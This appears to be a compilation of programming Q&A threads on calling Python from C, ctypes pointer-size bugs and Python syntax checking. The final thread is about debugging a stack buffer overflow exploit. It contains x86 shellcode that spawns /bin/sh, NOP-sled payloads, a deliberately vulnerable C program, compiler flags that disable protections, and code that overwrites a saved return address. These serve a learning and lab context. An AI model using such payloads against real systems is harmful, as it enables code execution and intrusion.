C system() return value from a Python script - confusing! - python

I need to call a Python script from C and be able to catch its return values. It doesn't particularly matter what the values are (they may as well be an enum), but the values I got from a test case confused me, and I wanted to get to the bottom of what I was seeing.
So, here is the C:
#include <stdlib.h>
#include <stdio.h>
int main(void)
{
    int out = 0;
    out = system("python /1.py");
    printf("script 1 returned %d\n", out);
    return 0;
}
And here is /1.py:
import sys
sys.exit(1)
The output of these programs is:
script 1 returned 256
Some other values (value passed to sys.exit -> value printed):
2 -> 512
800 -> 8192
8073784 -> 14336
Is it reading little-endian rather than big-endian, or something like that? How can I write a C function (or trick Python) so that it returns and interprets the numbers correctly?

From the Linux documentation on system():
... return status is in the format specified in wait(2). Thus, the exit code of the command will be WEXITSTATUS(status) ...
From following the link on wait, we get the following:
WEXITSTATUS(status): returns the exit status of the child. ... This macro should only be employed if WIFEXITED returned true.
What this amounts to is that you can't use the return value of system() directly, but must use the macros to extract the exit code. Note that this format comes from POSIX, not from the C standard, which leaves the return value of system() implementation-defined. The same procedure therefore works on any POSIX system, but other platforms (such as Windows) may report the exit code differently.
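A minimal sketch of that procedure, assuming a POSIX system (the helper name run_and_get_exit_code is hypothetical). It also explains the numbers in the question, which have nothing to do with endianness: the exit code sits in bits 8-15 of the status, so exit code 1 shows up as 1 << 8 = 256 and exit code 2 as 512. In addition, only the low 8 bits of an exit code survive, so sys.exit(800) becomes 800 & 0xFF = 32 (printed as 32 << 8 = 8192) and sys.exit(8073784) becomes 56 (printed as 56 << 8 = 14336).

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

/* Run `cmd` through system() and return the command's exit code (0..255),
   or -1 if no shell could be started or the command did not exit normally
   (for example, because it was killed by a signal). */
int run_and_get_exit_code(const char *cmd)
{
    assert(cmd != NULL);
    int status = system(cmd);   /* a wait(2)-style status, NOT the exit code */

    if (status == -1)
        return -1;              /* the child process could not be created */
    if (WIFEXITED(status))
        return WEXITSTATUS(status);
    if (WIFSIGNALED(status))
        fprintf(stderr, "command killed by signal %d\n", WTERMSIG(status));
    return -1;
}
```

With this helper, run_and_get_exit_code("python /1.py") should return 1 for the script in the question.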

The system() return value is a termination status in the format specified for waitpid(), not the plain exit code you would see in the shell's $?. I can't recall the details, but on Linux it works something like this:
int exit_value, signal_num, dumped_core;
...
exit_value = out >> 8;
signal_num = out & 127;
dumped_core = out & 128;
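The same decoding wrapped in a function, as a minimal sketch that assumes the traditional Linux/glibc bit layout (the struct and function names are hypothetical; portable code should prefer the <sys/wait.h> macros). The & 0xFF mask keeps only the 8 exit-code bits. Applied to the values from the question, decode_status(256).exit_value is 1 and decode_status(14336).exit_value is 56.

```c
#include <assert.h>

/* Fields of a wait status, decoded by hand (traditional Linux layout). */
struct wait_fields {
    int exit_value;   /* bits 8-15: exit code, meaningful only if signal_num == 0 */
    int signal_num;   /* bits 0-6: signal that killed the child, 0 if it exited   */
    int dumped_core;  /* bit 7: 1 if a core dump was written                      */
};

struct wait_fields decode_status(int status)
{
    struct wait_fields f;
    f.exit_value  = (status >> 8) & 0xFF;  /* keep only the 8 exit-code bits */
    f.signal_num  = status & 0x7F;         /* 127 */
    f.dumped_core = (status & 0x80) != 0;  /* 128 */
    return f;
}
```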

Related

Getting result of PyRun_String when python code returns an object

I have a problem with my code.
I have a Python file for capturing MAVLink messages (I'm using the pymavlink library), and I need to create a library that interfaces the Python results with C/C++ code.
This is the Python code from the .py file:
from pymavlink import mavutil
the_connection = mavutil.mavlink_connection('udpin:localhost:14550')
the_connection.wait_heartbeat()
print("Heartbeat from system (system %u component %u)" % (the_connection.target_system, the_connection.target_component))
while 1:
    attitude=the_connection.messages['ATTITUDE']
    print("attitude: ",attitude)
I need to retrieve the attitude object as a PyObject. The output of the last print is:
attitude: ATTITUDE {time_boot_ms : 1351674, roll : -0.006938610225915909, pitch : -0.009435104206204414, yaw : 1.8100472688674927, rollspeed : 0.0005244240164756775, pitchspeed : -0.0023000920191407204, yawspeed : 0.0002169199287891388}
I receive a stream of messages, so I need to open the connection and then evaluate the result in a loop. So I tried running simple Python commands as strings to open the connection and then access the data. My C code is:
Py_Initialize();
PyRun_SimpleString("from pymavlink import mavutil\n"
                   "the_connection = mavutil.mavlink_connection('udpin:localhost:14550')\n"
                   "the_connection.wait_heartbeat()\n"
                   "print(\"Heartbeat from system (system %u component %u)\" % (the_connection.target_system, the_connection.target_component), flush=True)" );
PyObject* main_module=PyImport_AddModule("__main__");
PyObject* pdict = PyModule_GetDict(main_module);
PyObject* pdict_new = PyDict_New();
while (1) {
    PyObject* pval = PyRun_String("the_connection.messages['ATTITUDE']", Py_single_input, pdict, pdict_new);
    PyObject* repr = PyObject_Str(pval);
    PyObject* str = PyUnicode_AsEncodedString(repr, "utf-8", "~E~");
    const char* bytes = PyBytes_AS_STRING(str);
    PyObject_Print(pval, stdout, 0);
    printf(" end\n");
    Py_XDECREF(repr);
}
Py_Finalize();
The result of this code is:
<pymavlink.dialects.v20.ardupilotmega.MAVLink_attitude_message object at 0x7fba218220>
None end
<pymavlink.dialects.v20.ardupilotmega.MAVLink_attitude_message object at 0x7fba218220>
None end
<pymavlink.dialects.v20.ardupilotmega.MAVLink_attitude_message object at 0x7fba218220>
None end
<pymavlink.dialects.v20.ardupilotmega.MAVLink_attitude_message object at 0x7fba218220>
None end
I've tried returning the object, but it didn't work:
PyObject* pval = PyRun_String("return(the_connection.messages['ATTITUDE'])", Py_single_input, pdict, pdict_new);
I'm not a C/C++ expert. Is there a way to obtain the result correctly? I'm not interested in a string format; I only need a way to use the result as a C object.
I'm using Python 3.9 on a Raspberry Pi; the gcc version is 10.2.1.
Thank you
You want
PyRun_String("the_connection.messages['ATTITUDE']", Py_eval_input, pdict, pdict_new);
Py_eval_input treats it like the Python builtin eval (so what you're running must be an expression rather than a statement, which it is...).
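In contrast, Py_single_input evaluates a single statement the way the interactive prompt does: the value of an expression statement is printed (which is where the <pymavlink...MAVLink_attitude_message object at ...> lines in your output come from), and the call itself returns None, because a statement doesn't necessarily produce a value. (In Python every expression can be used as a statement, but not every statement is an expression.) It's more akin to exec, but only handles a single statement.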
Using "return(the_connection.messages['ATTITUDE'])" doesn't work because return is specifically designed to appear in a Python function.

Why doesn't the Python compiler ignore syntax errors after exit()?

I have a question about the Python compiler.
I ran the code below and got some errors that didn't seem logical.
If you run Python code that calls exit(), the program exits and the code that follows doesn't run. But I added an exit() call to my program, followed by a syntax error, and the program failed with that syntax error. I want to know why the Python compiler didn't optimize my code before running it. I tried the same thing with logical errors, such as an index-out-of-range error, and those were ignored. So why doesn't the code below work, and why does the syntax error happen?
Simple code:
print("Hi")
exit()
if
as you can see we run
It refuses to run your program precisely because it's a compiler (to bytecode, which it later interprets): the whole file must compile before any of it executes. It doesn't stop parsing when it sees an exit(), unlike a shell, which reads and interprets a script one line at a time. (That's not "optimization", BTW.)
Python compiles it to bytecode that calls exit if that point in the program is reached. Even unreachable code has to be syntactically valid so the whole file compiles. But since it never actually executes, it can't cause any run-time errors.
It's not an arbitrary process. The C compiler works smarter; how can the C compiler detect it?
For example, if you run a while 1 program in C, it doesn't run because of the logic. So why doesn't Python do the same thing?
That's not true.
C compilers choke on syntax errors in unreachable blocks, like int foo(){ if(0) if if; }. Also, while 1 isn't valid C syntax.
https://godbolt.org/z/cP83Y866b. Only #if 0 preprocessor stuff, or comments, can hide stuff from the compiler so it doesn't have to be valid syntax and grammar.
Syntax and grammar need to be valid in the whole file for it to parse into something the compiler can compile.
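The same point as a minimal C sketch (the function name after_exit_demo is hypothetical): exit() only stops the program when it actually runs, an if (0) block is never executed but must still be valid code, and only a false #if (or a comment) hides arbitrary text from the compiler.

```c
#include <assert.h>
#include <stdlib.h>

int after_exit_demo(int call_exit)
{
    if (call_exit)
        exit(0);      /* like Python's exit(): takes effect only at run time */

    if (0) {
        /* Never executed, but still parsed and type-checked.
           Writing something like `if if;` here is a compile error. */
        return -1;
    }

#if 0
    Only text inside a false preprocessor conditional or a comment
    escapes the compiler proper: if if ; int x = = 2 ;
#endif

    return 42;
}
```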
In C++, unreachable code (that isn't commented out) even has to be valid in terms of types matching, e.g. T x = y; won't compile if T is int but y's type is char*. That would be syntactically valid but "ill-formed". (In C, the same initialization is a constraint violation that requires a diagnostic.) Per cppreference: "Outside a template, a discarded statement is fully checked. if constexpr is not a substitute for the #if preprocessing directive."
But inside a template, if constexpr can hide some things, for example: https://godbolt.org/z/frTcbMb3T
template <typename T> // being a template function makes if constexpr special
void foo(int x) {
    if constexpr (false) {
        int x = "hi"; // ill-formed, type mismatch. But still valid *syntax*
    }
#if 1 // 0 would truly ignore all text until the closing #endif
    if constexpr (false) {
        // int x = = 2; // syntax error if uncommented
    }
#endif
}

Getting a SIGSEGV when calling python3 extension module function operating a Py_buffer

I'm toying around with Python C extension modules and I've got this simple function:
static PyObject *e_parse_metadata(PyObject *self, PyObject *args) {
    Py_buffer buf;
    if(!PyArg_ParseTuple(args, "y#", &buf)) {
        // interpreter raises exception, we return NULL to indicate failure
        return NULL;
    }
    fprintf(stdout, "extension: %c%c\n\n", *((char *) buf.buf) + 0, *((char*) buf.buf + 1)); // should print "BM"
    PyBuffer_Release(&buf);
    return PyLong_FromLong(33l);
}
It attempts to obtain a Py_buffer from an argument passed to it from within Python. It then displays the first 2 bytes from the buffer as characters to stdout, releases the buffer, and returns a reference to a new PyObject representing the integer 33.
Next I've got this Python example utilizing said function:
#!/usr/bin/env python3
import bbmp_utils # my module
with open('./mit.bmp', 'rb') as mit:
    if(mit.readable()):
        filedata = mit.read()
        res = bbmp_utils.parse_metadata(filedata) # call to my function in the extension module
        print(res, type(res))
This results in the extension module successfully printing the first 2 bytes from the byte stream (extension: BM) to stdout, but it then terminates: fish: “env PYTHONPATH=./build_dbg pyth…” terminated by signal SIGSEGV (Address boundary error)
Strangely enough, directly passing the bytes instance to my extension function doesn't cause a crash at all, e.g.
res = bbmp_utils.parse_metadata(mit.read())
Why does the first example result in a crash and the second one doesn't?
I was using the wrong format specifier when parsing the Python arguments.
y# does not fill in a Py_buffer at all: it expects two pointers, a const char ** for the data and a Py_ssize_t * for the length (with PY_SSIZE_T_CLEAN defined), and I had passed only &buf. Also note that the # variant assumes a read-only buffer.
y* works as expected.
This is fine but it still doesn't explain why one of the python versions crashes and the other doesn't.

Call a C++ function from Python

I've run into a problem: this DLL can be called successfully from Java or PHP, but when I call it from Python I get an access violation error.
I want to know whether mapping the C++ char* to ctypes c_char_p is wrong, and how to map a C++ char* with Python ctypes.
C++ DLL declarations:
#define Health_API extern "C" __declspec(dllexport)
Health_API unsigned long Initialization(int m_type,char * m_ip,int m_port);
Health_API int GetRecordCount(unsigned long m_handle);
Python code:
from ctypes import *
lib = cdll.LoadLibrary(r"./Health.dll")
inita = lib.Initialization
inita.argtype = (c_int, c_char_p, c_int)
inita.restype = c_ulong
getcount = lib.GetRecordCount
getcount.argtype = c_ulong
getcount.retype = c_int
# here call
handle = inita(5, '127.0.0.1'.encode(), 4000)
print(handle)
result = getcount(handle)
Error output:
2675930080
Traceback (most recent call last):
File "C:/Users/JayTam/PycharmProjects/DecoratorDemo/demo.py", line 14, in <module>
print(getcount(handle))
OSError: exception: access violation reading 0x000000009F7F73E0
Update after modification:
I found that if I don't set restype, it returns a negative number, which seems noteworthy. But when I changed restype to u_int64, it still couldn't connect.
Interestingly, my schoolmate called the same DLL successfully from her computer (Win7 x64), using the following simple code:
from ctypes import *
lib = cdll.LoadLibrary("./Health.dll")
handle = lib.Initialization(5, '127.0.0.1'.encode(), 4000)
lib.GetRecordList(handle, '')
I'm on Win10 x64 and my Python environment is Anaconda. I switched to the same environment as hers and used the same code, but I still get the same error.
Python vs Java
Although I know the environment is probably the cause, I really want to know what exactly causes it.
Python
On each run the handle is an irregular number (my classmate's PC gets regular numbers), for example: 288584672, 199521248, 1777824736, -607161376 (without setting restype).
This is Python calling the DLL; it can't connect to port 4000.
Java
Java also gets regular numbers, never negative ones, for example: 9462886128, 9454193200, 9458325520, 9451683632.
This is Java calling the DLL.
So I think this line must be causing the error, yet on another PC there is no problem, which is puzzling:
handle = lib.Initialization(5, '127.0.0.1'.encode(), 4000)
C++ DLL source:
Health_API unsigned long Initialization(int m_type,char* m_ip,int m_port)
{
CHandleNode* node;
switch(m_type)
{
case BASEINFO:
{
CBaseInfo* baseInfo = new CBaseInfo;
baseInfo->InitModule(m_ip,m_port);
node = m_info.AddMCUNode((unsigned long)baseInfo);
node->SetType(m_type);
return (unsigned long)baseInfo;
}
break;
case BASEINFO_ALLERGENS:
{
CBaseInfo_Allergens* baseInfo_Allergens = new CBaseInfo_Allergens;
baseInfo_Allergens->InitModule(m_ip,m_port);
node = m_info.AddMCUNode((unsigned long)baseInfo_Allergens);
node->SetType(m_type);
return (unsigned long)baseInfo_Allergens;
}
break;
// ... (too many cases to list here)
}
return -1;
}
Health_API int GetRecordList(unsigned long m_handle,char* m_index)
{
CHandleNode* node = m_info.GetMCUNode(m_handle);
if( node == NULL)
{
return -1;
}
switch(node->GetType())
{
case BASEINFO:
{
CBaseInfo* baseInfo = (CBaseInfo*)m_handle;
return baseInfo->GetRecordList(m_index);
}
break;
case BASEINFO_ALLERGENS:
{
CBaseInfo_Allergens* baseInfo_Allergens = (CBaseInfo_Allergens *)m_handle;
return baseInfo_Allergens->GetRecordList(m_index);
}
break;
// ... (too many cases to list here)
}
return -1;
}
It may help to have the source code of the C++, but I can take some guesses
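I don't think this is related, but:
getcount.retype is missing an s; it should be restype.
Likewise, argtype should be argtypes. ctypes silently ignores the misspelled attributes, so as written none of those argument or return types are actually applied. argtypes must be a sequence (I always use a list), even when there is only one argument, e.g. getcount.argtypes = [c_ulong].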
If the char* is a null-terminated string, you do indeed need c_char_p. In that case it is also highly recommended to declare the m_ip parameter as const char*.
If the char* is a pointer to a raw buffer (filled or not by the called function), which is not the case here, you need POINTER(c_char), not c_char_p.
Based on the error message, your handle is a pointer, so you should use the right type for it in your C++ code: void*. And in your Python you should use c_void_p.
Is it 64 bits code ? What toolchain/compiler was used to build the DLL ? What is the size of unsigned long in this toolchain ?
Edit: Here is the reason for your problem: Is Python's ctypes.c_long 64 bit on 64 bit systems?
handle is a pointer in your DLL, which was probably built with a compiler where long is 64 bits, but for 64-bit Python on Windows a C long (and therefore c_long/c_ulong) is only 32 bits, which cannot hold your pointer. (If you don't set restype at all, ctypes assumes a C int return type, which is also 32 bits; that is where the negative handles come from.) You really should use a void*.
First, you could try using c_void_p for the handle in your Python without modifying your source code; it may work, depending on the compiler used. But since the size of long is not fixed by any standard and may be too small to store a pointer, you really should use void* or uintptr_t in your C++ code.
Edit2: If you are using Visual Studio (or any compiler that follows the Windows x64 LLP64 model, such as MinGW-w64), a long is only 32 bits (Size of long vs int on x64 platform).
So you must fix the code of the DLL.
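A minimal sketch of a pointer-safe handle API, assuming the DLL can be changed. Only the names Initialization and GetRecordCount come from the question; the HealthModule struct, the Release function and the helper conversions are hypothetical stand-ins for the real CBaseInfo classes, and the Health_API export macro is omitted so the sketch also builds outside Windows. On the Python side this would pair with Initialization.argtypes = [c_int, c_char_p, c_int], Initialization.restype = c_void_p and GetRecordCount.argtypes = [c_void_p], GetRecordCount.restype = c_int.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical module object standing in for CBaseInfo and friends. */
typedef struct HealthModule {
    int type;
    char ip[64];
    int port;
    int record_count;
} HealthModule;

/* Return the handle as void* (c_void_p in ctypes) instead of unsigned long:
   on Windows x64, long is 32 bits but pointers are 64 bits. */
void *Initialization(int m_type, const char *m_ip, int m_port)
{
    HealthModule *m = calloc(1, sizeof *m);
    if (m == NULL || m_ip == NULL) {
        free(m);
        return NULL;            /* NULL replaces the old `return -1` error value */
    }
    m->type = m_type;
    strncpy(m->ip, m_ip, sizeof m->ip - 1);  /* calloc already zeroed the terminator */
    m->port = m_port;
    return m;
}

int GetRecordCount(void *m_handle)
{
    const HealthModule *m = m_handle;
    return m == NULL ? -1 : m->record_count;
}

/* Hypothetical cleanup function; the original DLL's cleanup API is not shown. */
void Release(void *m_handle)
{
    free(m_handle);
}

/* If an integer handle is unavoidable, uintptr_t (unlike unsigned long)
   is guaranteed to round-trip a void*. */
uintptr_t handle_to_int(void *h) { return (uintptr_t)h; }
void *int_to_handle(uintptr_t v) { return (void *)v; }
```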

Why is my stack buffer overflow exploit not working?

So I have a really simple stack overflow:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[]) {
    char buf[256];
    memcpy(buf, argv[1],strlen(argv[1]));
    printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance, if I point EIP to NOPs, the NOPs never get executed. Like so:
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow themselves on Linux x86 and post the results?
UPDATE
Never mind, y'all, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All I'm doing is overflowing the stack at the beginning and pointing to my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I don't understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and not other times. Sometimes my overwritten EIP is changed by gdb. Does anyone know what I'm missing? Also, I can only spawn a shell in gdb and not in the normal process. On top of that, I can only seem to start a shell once in gdb, and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack being turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.
There are several protections against this attack that come straight from the compiler. For example, your stack may not be executable. Check with:
readelf -l <filename>
If your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack (so you should "return to libc" to spawn your shell).
There could also be canary protection: a value placed in memory between your variables and the saved return address that is checked for integrity, so if your string overwrites it, the program aborts.
If you are trying this on your own program, consider removing some of these protections with gcc options:
gcc -fno-stack-protector -z execstack
Also, a note on your assembly: you usually put NOPs before your shellcode, so you don't have to hit the exact address where the shellcode starts.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that will be loaded into the instruction pointer, you can modify the last hex digits to point somewhere inside your NOPs, not necessarily at the beginning of your buffer.
Of course, gdb should become your best friend if you are trying something like this.
Hope this helps.
This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. Linux), the kernel sets the initial stack pointer at the top of the stack region (a fixed address, unless stack randomization as part of ASLR is enabled).
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for each environment variable) and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then counts them (e.g. envcount), creates a char *envp[envcount + 1] on the stack, and fills in the envp values with pointers to those strings. It NULL-terminates this envp array.
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o) which does some init and then calls main(argc,argv,envp)
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On x86-64, the argc, argv, and envp values are passed in the first three argument registers of the System V ABI (rdi, rsi, rdx); on 32-bit x86 they are passed on the stack.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So any code you write must be position-independent (e.g. using RIP-relative addressing on x86-64) and [probably] built with -fPIC.
And the resulting code can't have a zero byte in the middle, because it is conveyed [by the kernel] as a NUL-terminated string. So a string that contains a zero byte (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte4>,<byte5>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8.
So, then do: *fp = argv[1] and return.
Note that extra steps may be necessary if the stack has the NX bit set, because the string pointed to by argv[1] is on the stack, as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
    static char buf[] = "shellcode: hello\n";
    char *cp;

    for (cp = buf; *cp != 0; ++cp);

    // NOTE: in real shell code, we couldn't rely on using this function, so
    // these would need to be the CPP macro versions: _syscall3 and _syscall2
    // respectively or the syscall function would need to be _statically_
    // linked in
    syscall(SYS_write,1,buf,cp - buf);
    syscall(SYS_exit,0);
}

int
main(int argc,char **argv)
{
    void *retadr = __builtin_return_address(0);
    void **fp = __builtin_frame_address(0);
    int iter;

    printf("retadr=%p\n",retadr);
    printf("fp=%p\n",fp);

    // NOTE: for your example, replace:
    //   *fp = (void *) shellcode;
    // with:
    //   *fp = (void *) argv[1]
    for (iter = 20; iter > 0; --iter, fp += 1) {
        printf("fp=%p %p\n",fp,*fp);
        if (*fp == retadr) {
            *fp = (void *) shellcode;
            break;
        }
    }

    if (iter <= 0)
        printf("main: no match\n");

    return 0;
}
I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
    __asm__("movl %esp,%eax");
}
I called it at the end of main, right before the return, to get an idea of where the stack was. From there I just played with that value, subtracting 4 from the printed ESP until it worked.
